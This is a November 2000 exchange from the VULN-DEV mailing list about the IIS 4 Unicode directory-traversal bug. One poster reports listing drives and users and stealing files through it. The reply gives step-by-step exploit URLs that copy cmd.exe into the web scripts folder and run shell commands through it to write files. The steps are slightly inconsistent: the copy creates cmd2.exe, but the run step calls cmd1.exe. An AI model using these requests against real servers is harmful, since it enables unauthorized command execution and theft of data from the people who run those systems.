From: [ K o S a K ] [kosak@EPSYLON.ORG]
Sent: Thursday, November 09, 2000 8:21 PM
To: VULN-DEV@SECURITYFOCUS.COM
Subject: Re: dos commands via iis 4

To create a file :

First copy \winnt\system32\cmd.exe in /inetpub/scripts/
http://www.site.com/scripts/..%c0%af/winnt/system32/cmd.exe?/c+copy+..\..\wi
nnt\system32\cmd.exe+cmd2.exe

Then Run :
http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+echo+hack
+>file.txt

now dir,  your file is created.

[ KoSaK ]








----- Original Message -----
From: "booboo" <booboo@65535.COM>
To: <VULN-DEV@SECURITYFOCUS.COM>
Sent: Thursday, November 09, 2000 12:21 PM
Subject: dos commands via iis 4


> Dear Guys,
> I have been playing around with the latest iis unicode bug using
> the ..%c0%af.. strings and have had some success. I have been able to get
> directory listings of all the drives, lists of users and shares and steal
> files etc.. However, I have not been able to create files. I have been
> trying to use 'type'with re-directs but it does not seem to like the
> re-direct symbols. I have tried in quotation marks and using hex but no
> luck. Does anyone know how to do it.. or has an alternative..
>
> This is just for testing. Any help appreciated.
>
> BooBoo
>